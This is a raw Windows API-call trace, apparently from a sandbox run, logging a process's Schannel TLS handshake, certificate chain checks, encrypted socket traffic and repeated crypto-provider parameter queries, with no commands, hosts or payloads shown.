	[0123.715] CoTaskMemFree (pv=0x2ad3bab7c90) 
	[0123.715] lstrlenW (lpString="Schannel Security Package") returned 25
	[0123.715] CoTaskMemAlloc (cb=0x36) returned 0x2ad3baa9ab0
	[0123.715] RtlMoveMemory (in: Destination=0x2ad3baa9ab0, Source=0x2ad3baccde4, Length=0x34 | out: Destination=0x2ad3baa9ab0) 
	[0123.715] CoTaskMemFree (pv=0x2ad3baa9ab0) 
	[0123.715] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0123.715] CoTaskMemAlloc (cb=0x5c) returned 0x2ad22d5ca40
	[0123.715] RtlMoveMemory (in: Destination=0x2ad22d5ca40, Source=0x2ad3bacce18, Length=0x5a | out: Destination=0x2ad22d5ca40) 
	[0123.715] CoTaskMemFree (pv=0x2ad22d5ca40) 
	[0123.715] lstrlenW (lpString="Schannel Security Package") returned 25
	[0123.715] CoTaskMemAlloc (cb=0x36) returned 0x2ad3baa9f30
	[0123.715] RtlMoveMemory (in: Destination=0x2ad3baa9f30, Source=0x2ad3bacce72, Length=0x34 | out: Destination=0x2ad3baa9f30) 
	[0123.715] CoTaskMemFree (pv=0x2ad3baa9f30) 
	[0123.715] lstrlenW (lpString="CREDSSP") returned 7
	[0123.715] CoTaskMemAlloc (cb=0x12) returned 0x2ad3bab7a10
	[0123.715] RtlMoveMemory (in: Destination=0x2ad3bab7a10, Source=0x2ad3baccea6, Length=0x10 | out: Destination=0x2ad3bab7a10) 
	[0123.715] CoTaskMemFree (pv=0x2ad3bab7a10) 
	[0123.715] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0123.715] CoTaskMemAlloc (cb=0x4a) returned 0x2ad22d59fe0
	[0123.715] RtlMoveMemory (in: Destination=0x2ad22d59fe0, Source=0x2ad3bacceb6, Length=0x48 | out: Destination=0x2ad22d59fe0) 
	[0123.715] CoTaskMemFree (pv=0x2ad22d59fe0) 
	[0123.715] FreeContextBuffer (in: pvContextBuffer=0x2ad3bacca40 | out: pvContextBuffer=0x2ad3bacca40) returned 0x0
	[0123.720] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.720] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d4b8 | out: TokenHandle=0xd7ef71d4b8*=0x79c) returned 1
	[0123.722] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2ad237c9058, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0xd7ef71d3c8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0xd7ef71d3b8, ptsExpiry=0xd7ef71d3b0 | out: phCredential=0xd7ef71d3b8, ptsExpiry=0xd7ef71d3b0) returned 0x0
	[0123.726] InitializeSecurityContextW (in: phCredential=0xd7ef71d5c0, phContext=0x0, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71d5b0, pOutput=0x2ad237cb8a0, pfContextAttr=0xd7ef71d5a8, ptsExpiry=0xd7ef71d5a0 | out: phNewContext=0xd7ef71d5b0, pOutput=0x2ad237cb8a0, pfContextAttr=0xd7ef71d5a8, ptsExpiry=0xd7ef71d5a0) returned 0x90312
	[0123.727] FreeContextBuffer (in: pvContextBuffer=0x2ad22d255f0 | out: pvContextBuffer=0x2ad22d255f0) returned 0x0
	[0123.731] send (in: s=0x7d0, buf=0x2ad237cb970*, len=125, flags=0 | out: buf=0x2ad237cb970*) returned 125
	[0123.732] recv (in: s=0x7d0, buf=0x2ad237cb970, len=5, flags=0 | out: buf=0x2ad237cb970*) returned 5
	[0123.840] recv (in: s=0x7d0, buf=0x2ad237cb975, len=61, flags=0 | out: buf=0x2ad237cb975*) returned 61
	[0123.841] InitializeSecurityContextW (in: phCredential=0xd7ef71d4f0, phContext=0xd7ef71d7a0, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237cbc88, Reserved2=0x0, phNewContext=0xd7ef71d4e0, pOutput=0x2ad237cbca8, pfContextAttr=0xd7ef71d4d8, ptsExpiry=0xd7ef71d4d0 | out: phNewContext=0xd7ef71d4e0, pOutput=0x2ad237cbca8, pfContextAttr=0xd7ef71d4d8, ptsExpiry=0xd7ef71d4d0) returned 0x90312
	[0123.841] recv (in: s=0x7d0, buf=0x2ad237cbd98, len=5, flags=0 | out: buf=0x2ad237cbd98*) returned 5
	[0123.841] recv (in: s=0x7d0, buf=0x2ad237cbdbd, len=1575, flags=0 | out: buf=0x2ad237cbdbd*) returned 1575
	[0123.841] InitializeSecurityContextW (in: phCredential=0xd7ef71d430, phContext=0xd7ef71d6e0, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237cc4b8, Reserved2=0x0, phNewContext=0xd7ef71d420, pOutput=0x2ad237cc4d8, pfContextAttr=0xd7ef71d418, ptsExpiry=0xd7ef71d410 | out: phNewContext=0xd7ef71d420, pOutput=0x2ad237cc4d8, pfContextAttr=0xd7ef71d418, ptsExpiry=0xd7ef71d410) returned 0x90312
	[0123.842] recv (in: s=0x7d0, buf=0x2ad237cc5c8, len=5, flags=0 | out: buf=0x2ad237cc5c8*) returned 5
	[0123.842] recv (in: s=0x7d0, buf=0x2ad237cc5ed, len=331, flags=0 | out: buf=0x2ad237cc5ed*) returned 331
	[0123.842] InitializeSecurityContextW (in: phCredential=0xd7ef71d370, phContext=0xd7ef71d620, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237cc808, Reserved2=0x0, phNewContext=0xd7ef71d360, pOutput=0x2ad237cc828, pfContextAttr=0xd7ef71d358, ptsExpiry=0xd7ef71d350 | out: phNewContext=0xd7ef71d360, pOutput=0x2ad237cc828, pfContextAttr=0xd7ef71d358, ptsExpiry=0xd7ef71d350) returned 0x90312
	[0123.842] recv (in: s=0x7d0, buf=0x2ad237cc918, len=5, flags=0 | out: buf=0x2ad237cc918*) returned 5
	[0123.842] recv (in: s=0x7d0, buf=0x2ad237cc93d, len=4, flags=0 | out: buf=0x2ad237cc93d*) returned 4
	[0123.842] InitializeSecurityContextW (in: phCredential=0xd7ef71d2b0, phContext=0xd7ef71d560, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237cca18, Reserved2=0x0, phNewContext=0xd7ef71d2a0, pOutput=0x2ad237cca38, pfContextAttr=0xd7ef71d298, ptsExpiry=0xd7ef71d290 | out: phNewContext=0xd7ef71d2a0, pOutput=0x2ad237cca38, pfContextAttr=0xd7ef71d298, ptsExpiry=0xd7ef71d290) returned 0x90312
	[0123.855] FreeContextBuffer (in: pvContextBuffer=0x2ad3bab2e50 | out: pvContextBuffer=0x2ad3bab2e50) returned 0x0
	[0123.855] send (in: s=0x7d0, buf=0x2ad237ccb08*, len=134, flags=0 | out: buf=0x2ad237ccb08*) returned 134
	[0123.855] recv (in: s=0x7d0, buf=0x2ad237ccb08, len=5, flags=0 | out: buf=0x2ad237ccb08*) returned 5
	[0123.962] recv (in: s=0x7d0, buf=0x2ad237ccbcd, len=218, flags=0 | out: buf=0x2ad237ccbcd*) returned 218
	[0123.962] InitializeSecurityContextW (in: phCredential=0xd7ef71d1f0, phContext=0xd7ef71d4a0, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237ccd78, Reserved2=0x0, phNewContext=0xd7ef71d1e0, pOutput=0x2ad237ccd98, pfContextAttr=0xd7ef71d1d8, ptsExpiry=0xd7ef71d1d0 | out: phNewContext=0xd7ef71d1e0, pOutput=0x2ad237ccd98, pfContextAttr=0xd7ef71d1d8, ptsExpiry=0xd7ef71d1d0) returned 0x90312
	[0123.962] recv (in: s=0x7d0, buf=0x2ad237cce88, len=5, flags=0 | out: buf=0x2ad237cce88*) returned 5
	[0123.962] recv (in: s=0x7d0, buf=0x2ad237ccead, len=1, flags=0 | out: buf=0x2ad237ccead*) returned 1
	[0123.962] InitializeSecurityContextW (in: phCredential=0xd7ef71d130, phContext=0xd7ef71d3e0, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237ccf80, Reserved2=0x0, phNewContext=0xd7ef71d120, pOutput=0x2ad237ccfa0, pfContextAttr=0xd7ef71d118, ptsExpiry=0xd7ef71d110 | out: phNewContext=0xd7ef71d120, pOutput=0x2ad237ccfa0, pfContextAttr=0xd7ef71d118, ptsExpiry=0xd7ef71d110) returned 0x90312
	[0123.962] recv (in: s=0x7d0, buf=0x2ad237cd090, len=5, flags=0 | out: buf=0x2ad237cd090*) returned 5
	[0123.962] recv (in: s=0x7d0, buf=0x2ad237cd0b5, len=48, flags=0 | out: buf=0x2ad237cd0b5*) returned 48
	[0123.962] InitializeSecurityContextW (in: phCredential=0xd7ef71d070, phContext=0xd7ef71d320, pTargetName=0x2ad237b81d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad237cd1b8, Reserved2=0x0, phNewContext=0xd7ef71d060, pOutput=0x2ad237cd1d8, pfContextAttr=0xd7ef71d058, ptsExpiry=0xd7ef71d050 | out: phNewContext=0xd7ef71d060, pOutput=0x2ad237cd1d8, pfContextAttr=0xd7ef71d058, ptsExpiry=0xd7ef71d050) returned 0x0
	[0123.964] QueryContextAttributesW (in: phContext=0xd7ef71d2d0, ulAttribute=0x4, pBuffer=0x2ad237cd2f0 | out: pBuffer=0x2ad237cd2f0) returned 0x0
	[0123.964] QueryContextAttributesW (in: phContext=0xd7ef71d2d0, ulAttribute=0x5a, pBuffer=0x2ad237cd370 | out: pBuffer=0x2ad237cd370) returned 0x0
	[0123.968] QueryContextAttributesW (in: phContext=0xd7ef71d180, ulAttribute=0x53, pBuffer=0x2ad237cd6c0 | out: pBuffer=0x2ad237cd6c0) returned 0x0
	[0123.971] CertDuplicateCertificateContext (pCertContext=0x2ad3babd6c0) returned 0x2ad3babd6c0
	[0123.972] CertDuplicateStore (hCertStore=0x2ad22c7b030) returned 0x2ad22c7b030
	[0123.972] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b030, pPrevCertContext=0x0) returned 0x2ad3babd6c0
	[0123.973] CertDuplicateCertificateContext (pCertContext=0x2ad3babd6c0) returned 0x2ad3babd6c0
	[0123.973] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b030, pPrevCertContext=0x2ad3babd6c0) returned 0x0
	[0123.973] CertCloseStore (hCertStore=0x2ad22c7b030, dwFlags=0x0) returned 1
	[0123.973] CertFreeCertificateContext (pCertContext=0x2ad3babd6c0) returned 1
	[0123.976] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0123.977] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3babd6c0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0123.978] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3babd6c0, pTime=0xd7ef71d188, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71d190, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71d180 | out: ppChainContext=0xd7ef71d180) returned 1
	[0124.020] CertDuplicateCertificateChain (pChainContext=0x2ad3bb094c0) returned 0x2ad3bb094c0
	[0124.021] CertDuplicateCertificateContext (pCertContext=0x2ad3babd6c0) returned 0x2ad3babd6c0
	[0124.022] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0124.023] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0124.023] CertFreeCertificateChain (pChainContext=0x2ad3bb094c0) 
	[0124.024] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3bb094c0, pPolicyPara=0xd7ef71d308, pPolicyStatus=0xd7ef71d2e8 | out: pPolicyStatus=0xd7ef71d2e8) returned 1
	[0124.024] SetLastError (dwErrCode=0x0) 
	[0124.025] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3bb094c0, pPolicyPara=0xd7ef71d3e0, pPolicyStatus=0xd7ef71d3c8 | out: pPolicyStatus=0xd7ef71d3c8) returned 1
	[0124.049] CertFreeCertificateChain (pChainContext=0x2ad3bb094c0) 
	[0124.049] CertFreeCertificateContext (pCertContext=0x2ad3babd6c0) returned 1
	[0124.051] EncryptMessage (in: phContext=0xd7ef71d9f0, fQOP=0x0, pMessage=0x2ad237d0d70, MessageSeqNo=0x0 | out: pMessage=0x2ad237d0d70) returned 0x0
	[0124.051] send (in: s=0x7d0, buf=0x2ad237d0a30*, len=245, flags=0 | out: buf=0x2ad237d0a30*) returned 245
	[0124.075] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0124.076] recv (in: s=0x7d0, buf=0x2ad237d0ed0, len=5, flags=0 | out: buf=0x2ad237d0ed0*) returned 5
	[0124.588] recv (in: s=0x7d0, buf=0x2ad237d0ef5, len=336, flags=0 | out: buf=0x2ad237d0ef5*) returned 336
	[0124.590] DecryptMessage (in: phContext=0xd7ef71d5b0, pMessage=0x2ad237d1158, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad237d1158, pfQOP=0x0) returned 0x0
	[0124.604] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0124.605] recv (in: s=0x7d0, buf=0x2ad237d0ef0, len=5, flags=0 | out: buf=0x2ad237d0ef0*) returned 5
	[0124.605] recv (in: s=0x7d0, buf=0x2ad237d52c5, len=5504, flags=0 | out: buf=0x2ad237d52c5*) returned 5504
	[0124.605] DecryptMessage (in: phContext=0xd7ef71db80, pMessage=0x2ad237d6958, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad237d6958, pfQOP=0x0) returned 0x0
	[0124.607] SetEvent (hEvent=0x6b8) returned 1
	[0124.645] _CxxThrowException () 
	[0124.654] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55500
	[0124.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55500, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0124.654] CoTaskMemFree (pv=0x2ad22d55500) 
	[0125.138] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55fa0
	[0125.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55fa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.196] VirtualQuery (in: lpAddress=0xef71d610, lpBuffer=0xd7ef71e4d0, dwLength=0x30 | out: lpBuffer=0xd7ef71e4d0*(BaseAddress=0xef71d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fe5f3000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0125.337] CoGetContextToken (in: pToken=0xd7ef71a7b0 | out: pToken=0xd7ef71a7b0) returned 0x0
	[0125.337] CoGetObjectContext (in: riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ad3baf11c8 | out: ppv=0x2ad3baf11c8*=0x2ad205dbe18) returned 0x0
	[0125.338] CoGetContextToken (in: pToken=0xd7ef71a780 | out: pToken=0xd7ef71a780) returned 0x0
	[0125.338] CoGetContextToken (in: pToken=0xd7ef71ac80 | out: pToken=0xd7ef71ac80) returned 0x0
	[0125.338] CoGetContextToken (in: pToken=0xd7ef71abc0 | out: pToken=0xd7ef71abc0) returned 0x0
	[0125.339] CoGetContextToken (in: pToken=0xd7ef71ade0 | out: pToken=0xd7ef71ade0) returned 0x0
	[0125.339] CoGetContextToken (in: pToken=0xd7ef71ad20 | out: pToken=0xd7ef71ad20) returned 0x0
	[0125.399] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x7ffc1620a480) returned 0x1
	[0125.425] CoGetContextToken (in: pToken=0xd7ef71a790 | out: pToken=0xd7ef71a790) returned 0x0
	[0125.425] CoGetContextToken (in: pToken=0xd7ef71a760 | out: pToken=0xd7ef71a760) returned 0x0
	[0125.426] CoGetContextToken (in: pToken=0xd7ef71ac60 | out: pToken=0xd7ef71ac60) returned 0x0
	[0125.426] CoGetContextToken (in: pToken=0xd7ef71aba0 | out: pToken=0xd7ef71aba0) returned 0x0
	[0125.428] CoGetContextToken (in: pToken=0xd7ef71af60 | out: pToken=0xd7ef71af60) returned 0x0
	[0125.428] CoGetContextToken (in: pToken=0xd7ef71aea0 | out: pToken=0xd7ef71aea0) returned 0x0
	[0125.429] CoGetContextToken (in: pToken=0xd7ef71a7b0 | out: pToken=0xd7ef71a7b0) returned 0x0
	[0125.430] CoGetContextToken (in: pToken=0xd7ef71a780 | out: pToken=0xd7ef71a780) returned 0x0
	[0125.430] CoGetContextToken (in: pToken=0xd7ef71ac80 | out: pToken=0xd7ef71ac80) returned 0x0
	[0125.430] CoGetContextToken (in: pToken=0xd7ef71abc0 | out: pToken=0xd7ef71abc0) returned 0x0
	[0125.431] CoGetContextToken (in: pToken=0xd7ef71aef0 | out: pToken=0xd7ef71aef0) returned 0x0
	[0125.431] CoGetContextToken (in: pToken=0xd7ef71ae30 | out: pToken=0xd7ef71ae30) returned 0x0
	[0125.545] CoGetContextToken (in: pToken=0xd7ef71a940 | out: pToken=0xd7ef71a940) returned 0x0
	[0125.545] CoGetContextToken (in: pToken=0xd7ef71a910 | out: pToken=0xd7ef71a910) returned 0x0
	[0125.546] CoGetContextToken (in: pToken=0xd7ef71ae10 | out: pToken=0xd7ef71ae10) returned 0x0
	[0125.546] CoGetContextToken (in: pToken=0xd7ef71ad50 | out: pToken=0xd7ef71ad50) returned 0x0
	[0125.546] CoGetContextToken (in: pToken=0xd7ef71af70 | out: pToken=0xd7ef71af70) returned 0x0
	[0125.546] CoGetContextToken (in: pToken=0xd7ef71aeb0 | out: pToken=0xd7ef71aeb0) returned 0x0
	[0125.550] CoGetContextToken (in: pToken=0xd7ef71a920 | out: pToken=0xd7ef71a920) returned 0x0
	[0125.550] CoGetContextToken (in: pToken=0xd7ef71a8f0 | out: pToken=0xd7ef71a8f0) returned 0x0
	[0125.551] CoGetContextToken (in: pToken=0xd7ef71adf0 | out: pToken=0xd7ef71adf0) returned 0x0
	[0125.551] CoGetContextToken (in: pToken=0xd7ef71ad30 | out: pToken=0xd7ef71ad30) returned 0x0
	[0125.551] CoGetContextToken (in: pToken=0xd7ef71b0f0 | out: pToken=0xd7ef71b0f0) returned 0x0
	[0125.551] CoGetContextToken (in: pToken=0xd7ef71b030 | out: pToken=0xd7ef71b030) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71a940 | out: pToken=0xd7ef71a940) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71a910 | out: pToken=0xd7ef71a910) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71ae10 | out: pToken=0xd7ef71ae10) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71ad50 | out: pToken=0xd7ef71ad50) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71b080 | out: pToken=0xd7ef71b080) returned 0x0
	[0125.552] CoGetContextToken (in: pToken=0xd7ef71afc0 | out: pToken=0xd7ef71afc0) returned 0x0
	[0125.607] CryptAcquireContextW (in: phProv=0xd7ef71c940, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd7ef71c940*=0x2ad3bb0ac10) returned 1
	[0125.613] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.613] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.613] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x1 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac92c0
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac92c0) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.614] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.614] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac92c0
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac92c0) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac92c0
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac92c0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac92c0) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemFree (pv=0x2ad3bac9080) 
